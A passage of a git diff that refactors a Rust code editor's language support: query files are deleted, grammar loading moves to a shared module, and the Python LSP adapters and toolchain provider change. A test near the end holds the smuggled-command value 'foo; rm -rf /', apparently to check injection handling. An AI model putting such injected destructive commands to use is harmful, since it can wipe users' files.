injection.language "comment")) diff --git a/crates/languages/src/jsonc/outline.scm b/crates/languages/src/jsonc/outline.scm deleted file mode 100644 index 43e2743478b27e4430bf3ddf82e49023d3bad584..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/outline.scm +++ /dev/null @@ -1,2 +0,0 @@ -(pair - key: (string (string_content) @name)) @item diff --git a/crates/languages/src/jsonc/redactions.scm b/crates/languages/src/jsonc/redactions.scm deleted file mode 100644 index 7359637244ac5892c0d57b41e2ef11652a3d0890..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/redactions.scm +++ /dev/null @@ -1,4 +0,0 @@ -(pair value: (number) @redact) -(pair value: (string) @redact) -(array (number) @redact) -(array (string) @redact) diff --git a/crates/languages/src/lib.rs b/crates/languages/src/lib.rs index c5e64aed639374655b0e60bde5dbd0b3da5468c3..9010bbde022e765b53ccceec042a075f85fc102b 100644 --- a/crates/languages/src/lib.rs +++ b/crates/languages/src/lib.rs @@ -1,14 +1,12 @@ -use anyhow::Context as _; use gpui::{App, SharedString, UpdateGlobal}; use node_runtime::NodeRuntime; use project::Fs; use python::PyprojectTomlManifestProvider; use rust::CargoManifestProvider; -use rust_embed::RustEmbed; use settings::{SemanticTokenRules, SettingsStore}; use smol::stream::StreamExt; -use std::{str, sync::Arc}; -use util::{ResultExt, asset_str}; +use std::sync::Arc; +use util::ResultExt; pub use language::*; @@ -35,11 +33,6 @@ mod yaml; pub(crate) use package_json::{PackageJson, PackageJsonData}; -#[derive(RustEmbed)] -#[folder = "src/"] -#[exclude = "*.rs"] -struct LanguageDir; - /// A shared grammar for plain text, exposed for reuse by downstream crates. 
#[cfg(feature = "tree-sitter-gitcommit")] pub static LANGUAGE_GIT_COMMIT: std::sync::LazyLock> = @@ -47,10 +40,11 @@ pub static LANGUAGE_GIT_COMMIT: std::sync::LazyLock> = Arc::new(Language::new( LanguageConfig { name: "Git Commit".into(), - soft_wrap: Some(language::language_settings::SoftWrap::EditorWidth), + soft_wrap: Some(language::SoftWrap::EditorWidth), matcher: LanguageMatcher { path_suffixes: vec!["COMMIT_EDITMSG".to_owned()], first_line_pattern: None, + ..LanguageMatcher::default() }, line_comments: vec![Arc::from("#")], ..LanguageConfig::default() @@ -61,32 +55,11 @@ pub static LANGUAGE_GIT_COMMIT: std::sync::LazyLock> = pub fn init(languages: Arc, fs: Arc, node: NodeRuntime, cx: &mut App) { #[cfg(feature = "load-grammars")] - languages.register_native_grammars([ - ("bash", tree_sitter_bash::LANGUAGE), - ("c", tree_sitter_c::LANGUAGE), - ("cpp", tree_sitter_cpp::LANGUAGE), - ("css", tree_sitter_css::LANGUAGE), - ("diff", tree_sitter_diff::LANGUAGE), - ("go", tree_sitter_go::LANGUAGE), - ("gomod", tree_sitter_go_mod::LANGUAGE), - ("gowork", tree_sitter_gowork::LANGUAGE), - ("jsdoc", tree_sitter_jsdoc::LANGUAGE), - ("json", tree_sitter_json::LANGUAGE), - ("jsonc", tree_sitter_json::LANGUAGE), - ("markdown", tree_sitter_md::LANGUAGE), - ("markdown-inline", tree_sitter_md::INLINE_LANGUAGE), - ("python", tree_sitter_python::LANGUAGE), - ("regex", tree_sitter_regex::LANGUAGE), - ("rust", tree_sitter_rust::LANGUAGE), - ("tsx", tree_sitter_typescript::LANGUAGE_TSX), - ("typescript", tree_sitter_typescript::LANGUAGE_TYPESCRIPT), - ("yaml", tree_sitter_yaml::LANGUAGE), - ("gitcommit", tree_sitter_gitcommit::LANGUAGE), - ]); + languages.register_native_grammars(grammars::native_grammars()); let c_lsp_adapter = Arc::new(c::CLspAdapter); let css_lsp_adapter = Arc::new(css::CssLspAdapter::new(node.clone())); - let eslint_adapter = Arc::new(eslint::EsLintLspAdapter::new(node.clone())); + let eslint_adapter = Arc::new(eslint::EsLintLspAdapter::new(node.clone(), 
fs.clone())); let go_context_provider = Arc::new(go::GoContextProvider); let go_lsp_adapter = Arc::new(go::GoLspAdapter); let json_context_provider = Arc::new(JsonTaskProvider); @@ -98,7 +71,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime let python_lsp_adapter = Arc::new(python::PyrightLspAdapter::new(node.clone())); let basedpyright_lsp_adapter = Arc::new(BasedPyrightLspAdapter::new(node.clone())); let ruff_lsp_adapter = Arc::new(RuffLspAdapter::new(fs.clone())); - let python_toolchain_provider = Arc::new(python::PythonToolchainProvider); + let python_toolchain_provider = Arc::new(python::PythonToolchainProvider::new(fs.clone())); let rust_context_provider = Arc::new(rust::RustContextProvider); let rust_lsp_adapter = Arc::new(rust::RustLspAdapter); let tailwind_adapter = Arc::new(tailwind::TailwindLspAdapter::new(node.clone())); @@ -125,6 +98,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime LanguageInfo { name: "cpp", adapters: vec![c_lsp_adapter], + semantic_token_rules: Some(cpp::semantic_token_rules()), ..Default::default() }, LanguageInfo { @@ -141,6 +115,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime name: "go", adapters: vec![go_lsp_adapter.clone()], context: Some(go_context_provider.clone()), + semantic_token_rules: Some(go::semantic_token_rules()), ..Default::default() }, LanguageInfo { @@ -179,11 +154,17 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime }, LanguageInfo { name: "python", - adapters: vec![basedpyright_lsp_adapter, ruff_lsp_adapter], + adapters: vec![ + basedpyright_lsp_adapter, + ruff_lsp_adapter, + ty_lsp_adapter, + py_lsp_adapter, + python_lsp_adapter, + ], context: Some(python_context_provider), toolchain: Some(python_toolchain_provider), manifest_name: Some(SharedString::new_static("pyproject.toml").into()), - ..Default::default() + semantic_token_rules: Some(python::semantic_token_rules()), }, LanguageInfo { name: "rust", @@ -281,9 +262,6 @@ pub fn init(languages: Arc, fs: Arc, node: 
NodeRuntime typescript_lsp_adapter, ); - languages.register_available_lsp_adapter(python_lsp_adapter.name(), python_lsp_adapter); - languages.register_available_lsp_adapter(py_lsp_adapter.name(), py_lsp_adapter); - languages.register_available_lsp_adapter(ty_lsp_adapter.name(), ty_lsp_adapter); // Register Tailwind for the existing languages that should have it by default. // // This can be driven by the `language_servers` setting once we have a way for @@ -293,7 +271,7 @@ pub fn init(languages: Arc, fs: Arc, node: NodeRuntime "CSS", "ERB", "HTML+ERB", - "HEEX", + "HEEx", "HTML", "JavaScript", "TypeScript", @@ -368,8 +346,8 @@ fn register_language( ) { let config = load_config(name); if let Some(rules) = &semantic_token_rules { - SettingsStore::update_global(cx, |store, _| { - store.set_language_semantic_token_rules(config.name.0.clone(), rules.clone()); + SettingsStore::update_global(cx, |store, cx| { + store.set_language_semantic_token_rules(config.name.0.clone(), rules.clone(), cx); }); } for adapter in adapters { @@ -384,7 +362,7 @@ fn register_language( Arc::new(move || { Ok(LoadedLanguage { config: config.clone(), - queries: load_queries(name), + queries: grammars::load_queries(name), context_provider: context.clone(), toolchain_provider: toolchain.clone(), manifest_name: manifest_name.clone(), @@ -396,56 +374,13 @@ fn register_language( #[cfg(any(test, feature = "test-support"))] pub fn language(name: &str, grammar: tree_sitter::Language) -> Arc { Arc::new( - Language::new(load_config(name), Some(grammar)) - .with_queries(load_queries(name)) + Language::new(grammars::load_config(name), Some(grammar)) + .with_queries(grammars::load_queries(name)) .unwrap(), ) } fn load_config(name: &str) -> LanguageConfig { - let config_toml = String::from_utf8( - LanguageDir::get(&format!("{}/config.toml", name)) - .unwrap_or_else(|| panic!("missing config for language {:?}", name)) - .data - .to_vec(), - ) - .unwrap(); - - #[allow(unused_mut)] - let mut config: 
LanguageConfig = ::toml::from_str(&config_toml) - .with_context(|| format!("failed to load config.toml for language {name:?}")) - .unwrap(); - - #[cfg(not(any(feature = "load-grammars", test)))] - { - config = LanguageConfig { - name: config.name, - matcher: config.matcher, - jsx_tag_auto_close: config.jsx_tag_auto_close, - ..Default::default() - } - } - - config -} - -fn load_queries(name: &str) -> LanguageQueries { - let mut result = LanguageQueries::default(); - for path in LanguageDir::iter() { - if let Some(remainder) = path.strip_prefix(name).and_then(|p| p.strip_prefix('/')) { - if !remainder.ends_with(".scm") { - continue; - } - for (name, query) in QUERY_FILENAME_PREFIXES { - if remainder.starts_with(name) { - let contents = asset_str::(path.as_ref()); - match query(&mut result) { - None => *query(&mut result) = Some(contents), - Some(r) => r.to_mut().push_str(contents.as_ref()), - } - } - } - } - } - result + let grammars_loaded = cfg!(any(feature = "load-grammars", test)); + grammars::load_config_for_feature(name, grammars_loaded) } diff --git a/crates/languages/src/markdown/brackets.scm b/crates/languages/src/markdown/brackets.scm deleted file mode 100644 index 172a2e7f723e3a170d80d19fa2f78fa334258105..0000000000000000000000000000000000000000 --- a/crates/languages/src/markdown/brackets.scm +++ /dev/null @@ -1,7 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(((fenced_code_block_delimiter) @open (fenced_code_block_delimiter) @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/markdown/outline.scm b/crates/languages/src/markdown/outline.scm deleted file mode 100644 index dcca3db4d4cb920a7d9f939dc99197d139c3c2e6..0000000000000000000000000000000000000000 --- a/crates/languages/src/markdown/outline.scm +++ /dev/null @@ -1,3 +0,0 @@ -(section - (atx_heading - . 
(_) @context . (_) @name)) @item diff --git a/crates/languages/src/markdown/textobjects.scm b/crates/languages/src/markdown/textobjects.scm deleted file mode 100644 index e0f76c5365155687d6d53d38f222513b480a3aa7..0000000000000000000000000000000000000000 --- a/crates/languages/src/markdown/textobjects.scm +++ /dev/null @@ -1,3 +0,0 @@ -(section - (atx_heading) - (_)* @class.inside) @class.around diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index 9eaf9764f100428b4bbbc80238f7da5847001470..d27db372bf3d5f84ba282b30afd060f3ae4b183e 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -5,10 +5,12 @@ use collections::HashMap; use futures::future::BoxFuture; use futures::lock::OwnedMutexGuard; use futures::{AsyncBufReadExt, StreamExt as _}; -use gpui::{App, AsyncApp, SharedString, Task}; +use gpui::{App, AsyncApp, Entity, SharedString, Task}; use http_client::github::{AssetKind, GitHubLspBinaryVersion, latest_github_release}; -use language::language_settings::language_settings; -use language::{ContextLocation, DynLspInstaller, LanguageToolchainStore, LspInstaller, Symbol}; +use language::language_settings::LanguageSettings; +use language::{ + Buffer, ContextLocation, DynLspInstaller, LanguageToolchainStore, LspInstaller, Symbol, +}; use language::{ContextProvider, LspAdapter, LspAdapterDelegate}; use language::{LanguageName, ManifestName, ManifestProvider, ManifestQuery}; use language::{Toolchain, ToolchainList, ToolchainLister, ToolchainMetadata}; @@ -24,7 +26,7 @@ use project::lsp_store::language_server_settings; use semver::Version; use serde::{Deserialize, Serialize}; use serde_json::{Value, json}; -use settings::Settings; +use settings::{SemanticTokenRules, Settings}; use terminal::terminal_settings::TerminalSettings; use smol::lock::OnceCell; @@ -49,6 +51,14 @@ use std::{ use task::{ShellKind, TaskTemplate, TaskTemplates, VariableName}; use util::{ResultExt, maybe}; +pub(crate) fn semantic_token_rules() -> 
SemanticTokenRules { + let content = grammars::get_file("python/semantic_token_rules.json") + .expect("missing python/semantic_token_rules.json"); + let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); + settings::parse_json_with_comments::(json) + .expect("failed to parse python semantic_token_rules.json") +} + #[derive(Debug, Serialize, Deserialize)] pub(crate) struct PythonToolchainData { #[serde(flatten)] @@ -159,6 +169,75 @@ fn process_pyright_completions(items: &mut [lsp::CompletionItem]) { } } +fn label_for_pyright_completion( + item: &lsp::CompletionItem, + language: &Arc, +) -> Option { + let label = &item.label; + let label_len = label.len(); + let grammar = language.grammar()?; + let highlight_id = match item.kind? { + lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"), + lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"), + lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"), + lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"), + lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"), + _ => { + return None; + } + }; + let mut text = label.clone(); + if let Some(completion_details) = item + .label_details + .as_ref() + .and_then(|details| details.description.as_ref()) + { + write!(&mut text, " {}", completion_details).ok(); + } + Some(language::CodeLabel::filtered( + text, + label_len, + item.filter_text.as_deref(), + highlight_id + .map(|id| (0..label_len, id)) + .into_iter() + .collect(), + )) +} + +fn label_for_python_symbol( + symbol: &Symbol, + language: &Arc, +) -> Option { + let name = &symbol.name; + let (text, filter_range, display_range) = match symbol.kind { + lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => { + let text = format!("def {}():\n", name); + let filter_range = 4..4 + name.len(); + let display_range = 0..filter_range.end; + (text, filter_range, 
display_range) + } + lsp::SymbolKind::CLASS => { + let text = format!("class {}:", name); + let filter_range = 6..6 + name.len(); + let display_range = 0..filter_range.end; + (text, filter_range, display_range) + } + lsp::SymbolKind::CONSTANT => { + let text = format!("{} = 0", name); + let filter_range = 0..name.len(); + let display_range = 0..filter_range.end; + (text, filter_range, display_range) + } + _ => return None, + }; + Some(language::CodeLabel::new( + text[display_range.clone()].to_string(), + filter_range, + language.highlight_text(&text.as_str().into(), display_range), + )) +} + pub struct TyLspAdapter { fs: Arc, } @@ -255,6 +334,14 @@ impl LspAdapter for TyLspAdapter { )) } + async fn label_for_symbol( + &self, + symbol: &language::Symbol, + language: &Arc, + ) -> Option { + label_for_python_symbol(symbol, language) + } + async fn workspace_configuration( self: Arc, delegate: &Arc, @@ -360,7 +447,7 @@ impl LspInstaller for TyLspAdapter { async_fs::create_dir_all(&destination_path).await?; let server_path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => destination_path + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => destination_path .join(Self::build_asset_name()?.0) .join("ty"), AssetKind::Zip => destination_path.clone().join("ty.exe"), @@ -450,7 +537,7 @@ impl LspInstaller for TyLspAdapter { let path = last.context("no cached binary")?; let path = match TyLspAdapter::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => { path.join(Self::build_asset_name()?.0).join("ty") } AssetKind::Zip => path.join("ty.exe"), @@ -507,6 +594,7 @@ impl LspAdapter for PyrightLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { // Provide minimal initialization options // Virtual environment configuration will be handled through workspace configuration @@ -530,36 +618,7 @@ impl LspAdapter for PyrightLspAdapter { item: 
&lsp::CompletionItem, language: &Arc, ) -> Option { - let label = &item.label; - let label_len = label.len(); - let grammar = language.grammar()?; - let highlight_id = match item.kind? { - lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"), - lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"), - lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"), - lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"), - lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"), - _ => { - return None; - } - }; - let mut text = label.clone(); - if let Some(completion_details) = item - .label_details - .as_ref() - .and_then(|details| details.description.as_ref()) - { - write!(&mut text, " {}", completion_details).ok(); - } - Some(language::CodeLabel::filtered( - text, - label_len, - item.filter_text.as_deref(), - highlight_id - .map(|id| (0..label_len, id)) - .into_iter() - .collect(), - )) + label_for_pyright_completion(item, language) } async fn label_for_symbol( @@ -567,34 +626,7 @@ impl LspAdapter for PyrightLspAdapter { symbol: &language::Symbol, language: &Arc, ) -> Option { - let name = &symbol.name; - let (text, filter_range, display_range) = match symbol.kind { - lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => { - let text = format!("def {}():\n", name); - let filter_range = 4..4 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CLASS => { - let text = format!("class {}:", name); - let filter_range = 6..6 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CONSTANT => { - let text = format!("{} = 0", name); - let filter_range = 0..name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - _ => return None, - }; - - Some(language::CodeLabel::new( - 
text[display_range.clone()].to_string(), - filter_range, - language.highlight_text(&text.as_str().into(), display_range), - )) + label_for_python_symbol(symbol, language) } async fn workspace_configuration( @@ -800,11 +832,10 @@ impl ContextProvider for PythonContextProvider { toolchains: Arc, cx: &mut gpui::App, ) -> Task> { - let test_target = - match selected_test_runner(location.file_location.buffer.read(cx).file(), cx) { - TestRunner::UNITTEST => self.build_unittest_target(variables), - TestRunner::PYTEST => self.build_pytest_target(variables), - }; + let test_target = match selected_test_runner(Some(&location.file_location.buffer), cx) { + TestRunner::UNITTEST => self.build_unittest_target(variables), + TestRunner::PYTEST => self.build_pytest_target(variables), + }; let module_target = self.build_module_target(variables); let location_file = location.file_location.buffer.read(cx).file().cloned(); @@ -842,10 +873,10 @@ impl ContextProvider for PythonContextProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> Task> { - let test_runner = selected_test_runner(file.as_ref(), cx); + let test_runner = selected_test_runner(buffer.as_ref(), cx); let mut tasks = vec![ // Execute a selection @@ -952,9 +983,11 @@ impl ContextProvider for PythonContextProvider { } } -fn selected_test_runner(location: Option<&Arc>, cx: &App) -> TestRunner { +fn selected_test_runner(location: Option<&Entity>, cx: &App) -> TestRunner { const TEST_RUNNER_VARIABLE: &str = "TEST_RUNNER"; - language_settings(Some(LanguageName::new_static("Python")), location, cx) + let language = LanguageName::new_static("Python"); + let settings = LanguageSettings::resolve(location.map(|b| b.read(cx)), Some(&language), cx); + settings .tasks .variables .get(TEST_RUNNER_VARIABLE) @@ -1079,6 +1112,7 @@ fn python_env_kind_display(k: &PythonEnvironmentKind) -> &'static str { PythonEnvironmentKind::Venv => "venv", PythonEnvironmentKind::VirtualEnv => "virtualenv", 
PythonEnvironmentKind::VirtualEnvWrapper => "virtualenvwrapper", + PythonEnvironmentKind::WinPython => "WinPython", PythonEnvironmentKind::WindowsStore => "global (Windows Store)", PythonEnvironmentKind::WindowsRegistry => "global (Windows Registry)", PythonEnvironmentKind::Uv => "uv", @@ -1086,7 +1120,15 @@ fn python_env_kind_display(k: &PythonEnvironmentKind) -> &'static str { } } -pub(crate) struct PythonToolchainProvider; +pub(crate) struct PythonToolchainProvider { + fs: Arc, +} + +impl PythonToolchainProvider { + pub fn new(fs: Arc) -> Self { + Self { fs } + } +} static ENV_PRIORITY_LIST: &[PythonEnvironmentKind] = &[ // Prioritize non-Conda environments. @@ -1201,8 +1243,8 @@ impl ToolchainLister for PythonToolchainProvider { worktree_root: PathBuf, subroot_relative_path: Arc, project_env: Option>, - fs: &dyn Fs, ) -> ToolchainList { + let fs = &*self.fs; let env = project_env.unwrap_or_default(); let environment = EnvironmentApi::from_env(&env); let locators = pet::locators::create_locators( @@ -1333,8 +1375,8 @@ impl ToolchainLister for PythonToolchainProvider { &self, path: PathBuf, env: Option>, - fs: &dyn Fs, ) -> anyhow::Result { + let fs = &*self.fs; let env = env.unwrap_or_default(); let environment = EnvironmentApi::from_env(&env); let locators = pet::locators::create_locators( @@ -1377,12 +1419,9 @@ impl ToolchainLister for PythonToolchainProvider { match toolchain.environment.kind { Some(PythonEnvironmentKind::Conda) => { - let Some(manager_info) = &toolchain.environment.manager else { + if toolchain.environment.manager.is_none() { return vec![]; }; - if smol::fs::metadata(&manager_info.executable).await.is_err() { - return vec![]; - } let manager = match conda_manager { settings::CondaManager::Conda => "conda", @@ -1740,33 +1779,7 @@ impl LspAdapter for PyLspAdapter { symbol: &language::Symbol, language: &Arc, ) -> Option { - let name = &symbol.name; - let (text, filter_range, display_range) = match symbol.kind { - lsp::SymbolKind::METHOD | 
lsp::SymbolKind::FUNCTION => { - let text = format!("def {}():\n", name); - let filter_range = 4..4 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CLASS => { - let text = format!("class {}:", name); - let filter_range = 6..6 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CONSTANT => { - let text = format!("{} = 0", name); - let filter_range = 0..name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - _ => return None, - }; - Some(language::CodeLabel::new( - text[display_range.clone()].to_string(), - filter_range, - language.highlight_text(&text.as_str().into(), display_range), - )) + label_for_python_symbol(symbol, language) } async fn workspace_configuration( @@ -1848,6 +1861,17 @@ impl LspInstaller for PyLspAdapter { ) -> Option { if let Some(pylsp_bin) = delegate.which(Self::SERVER_NAME.as_ref()).await { let env = delegate.shell_env().await; + delegate + .try_exec(LanguageServerBinary { + path: pylsp_bin.clone(), + arguments: vec!["--version".into()], + env: Some(env.clone()), + }) + .await + .inspect_err(|err| { + log::warn!("failed to validate user-installed pylsp at {pylsp_bin:?}: {err:#}") + }) + .ok()?; Some(LanguageServerBinary { path: pylsp_bin, env: Some(env), @@ -1856,7 +1880,21 @@ impl LspInstaller for PyLspAdapter { } else { let toolchain = toolchain?; let pylsp_path = Path::new(toolchain.path.as_ref()).parent()?.join("pylsp"); - pylsp_path.exists().then(|| LanguageServerBinary { + if !pylsp_path.exists() { + return None; + } + delegate + .try_exec(LanguageServerBinary { + path: toolchain.path.to_string().into(), + arguments: vec![pylsp_path.clone().into(), "--version".into()], + env: None, + }) + .await + .inspect_err(|err| { + log::warn!("failed to validate toolchain pylsp at {pylsp_path:?}: {err:#}") + }) + .ok()?; + Some(LanguageServerBinary { path: 
toolchain.path.to_string().into(), arguments: vec![pylsp_path.into()], env: None, @@ -1972,6 +2010,7 @@ impl LspAdapter for BasedPyrightLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { // Provide minimal initialization options // Virtual environment configuration will be handled through workspace configuration @@ -1995,36 +2034,7 @@ impl LspAdapter for BasedPyrightLspAdapter { item: &lsp::CompletionItem, language: &Arc, ) -> Option { - let label = &item.label; - let label_len = label.len(); - let grammar = language.grammar()?; - let highlight_id = match item.kind? { - lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"), - lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"), - lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"), - lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"), - lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"), - _ => { - return None; - } - }; - let mut text = label.clone(); - if let Some(completion_details) = item - .label_details - .as_ref() - .and_then(|details| details.description.as_ref()) - { - write!(&mut text, " {}", completion_details).ok(); - } - Some(language::CodeLabel::filtered( - text, - label_len, - item.filter_text.as_deref(), - highlight_id - .map(|id| (0..label.len(), id)) - .into_iter() - .collect(), - )) + label_for_pyright_completion(item, language) } async fn label_for_symbol( @@ -2032,33 +2042,7 @@ impl LspAdapter for BasedPyrightLspAdapter { symbol: &Symbol, language: &Arc, ) -> Option { - let name = &symbol.name; - let (text, filter_range, display_range) = match symbol.kind { - lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => { - let text = format!("def {}():\n", name); - let filter_range = 4..4 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CLASS => { - let 
text = format!("class {}:", name); - let filter_range = 6..6 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CONSTANT => { - let text = format!("{} = 0", name); - let filter_range = 0..name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - _ => return None, - }; - Some(language::CodeLabel::new( - text[display_range.clone()].to_string(), - filter_range, - language.highlight_text(&text.as_str().into(), display_range), - )) + label_for_python_symbol(symbol, language) } async fn workspace_configuration( @@ -2543,7 +2527,7 @@ impl LspInstaller for RuffLspAdapter { } = latest_version; let destination_path = container_dir.join(format!("ruff-{name}")); let server_path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => destination_path + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => destination_path .join(Self::build_asset_name()?.0) .join("ruff"), AssetKind::Zip => destination_path.clone().join("ruff.exe"), @@ -2633,7 +2617,7 @@ impl LspInstaller for RuffLspAdapter { let path = last.context("no cached binary")?; let path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => { path.join(Self::build_asset_name()?.0).join("ruff") } AssetKind::Zip => path.join("ruff.exe"), @@ -2687,7 +2671,8 @@ mod tests { }); }); - let provider = PythonToolchainProvider; + let fs = project::FakeFs::new(cx.executor()); + let provider = PythonToolchainProvider::new(fs); let malicious_name = "foo; rm -rf /"; let manager_executable = std::env::current_exe().unwrap(); diff --git a/crates/languages/src/python/brackets.scm b/crates/languages/src/python/brackets.scm deleted file mode 100644 index 9e5b59788fc88fcb0830325417de50a9414828b8..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/brackets.scm +++ /dev/null @@ -1,4 +0,0 @@ -("(" @open ")" @close) 
-("[" @open "]" @close) -("{" @open "}" @close) -(((string_start) @open (string_end) @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/python/debugger.scm b/crates/languages/src/python/debugger.scm deleted file mode 100644 index 807d6e865d2f60637f60b397ccc1a61fe3360fa1..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/debugger.scm +++ /dev/null @@ -1,43 +0,0 @@ -(identifier) @debug-variable -(#eq? @debug-variable "self") - -(assignment left: (identifier) @debug-variable) -(assignment left: (pattern_list (identifier) @debug-variable)) -(assignment left: (tuple_pattern (identifier) @debug-variable)) - -(augmented_assignment left: (identifier) @debug-variable) - -(for_statement left: (identifier) @debug-variable) -(for_statement left: (pattern_list (identifier) @debug-variable)) -(for_statement left: (tuple_pattern (identifier) @debug-variable)) - -(for_in_clause left: (identifier) @debug-variable) -(for_in_clause left: (pattern_list (identifier) @debug-variable)) -(for_in_clause left: (tuple_pattern (identifier) @debug-variable)) - -(as_pattern (identifier) @debug-variable) - -(binary_operator left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_operator right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(comparison_operator (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(list (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(tuple (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(set (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(subscript value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(attribute object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? 
@debug-variable "^[A-Z]")) - -(argument_list (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(if_statement condition: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(while_statement condition: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(block) @debug-scope -(module) @debug-scope diff --git a/crates/languages/src/python/imports.scm b/crates/languages/src/python/imports.scm deleted file mode 100644 index 7a1e2b225b9e310098f316c29fe6b1a27634bf12..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/imports.scm +++ /dev/null @@ -1,32 +0,0 @@ -(import_statement - name: [ - (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .) - (aliased_import - name: (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .)) - ]) @wildcard @import - -(import_from_statement - module_name: [ - (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .) - (relative_import - (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .)?) - ] - (wildcard_import)? @wildcard - name: [ - (dotted_name - ((identifier) @namespace ".")* - (identifier) @name .) - (aliased_import - name: (dotted_name - ((identifier) @namespace ".")* - (identifier) @name .) - alias: (identifier) @alias) - ]?) @import diff --git a/crates/languages/src/python/outline.scm b/crates/languages/src/python/outline.scm deleted file mode 100644 index 70beb4e67585918ca1f893140ec79ee2428d47d7..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/outline.scm +++ /dev/null @@ -1,11 +0,0 @@ -(decorator) @annotation - -(class_definition - "class" @context - name: (identifier) @name - ) @item - -(function_definition - "async"? 
@context - "def" @context - name: (_) @name) @item diff --git a/crates/languages/src/python/runnables.scm b/crates/languages/src/python/runnables.scm deleted file mode 100644 index 1c7e76d73be2357c71ac2f3adf41b14db969e262..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/runnables.scm +++ /dev/null @@ -1,151 +0,0 @@ -; subclasses of unittest.TestCase or TestCase -( - (class_definition - name: (identifier) @run @_unittest_class_name - superclasses: (argument_list - [(identifier) @_superclass - (attribute (identifier) @_superclass)] - ) - (#eq? @_superclass "TestCase") - ) @_python-unittest-class - (#set! tag python-unittest-class) - ) - -; test methods whose names start with `test` in a TestCase -( - (class_definition - name: (identifier) @_unittest_class_name - superclasses: (argument_list - [(identifier) @_superclass - (attribute (identifier) @_superclass)] - ) - (#eq? @_superclass "TestCase") - body: (block - (function_definition - name: (identifier) @run @_unittest_method_name - (#match? @_unittest_method_name "^test.*") - ) @_python-unittest-method - (#set! tag python-unittest-method) - ) - ) - ) - -; pytest functions -( - (module - (function_definition - name: (identifier) @run 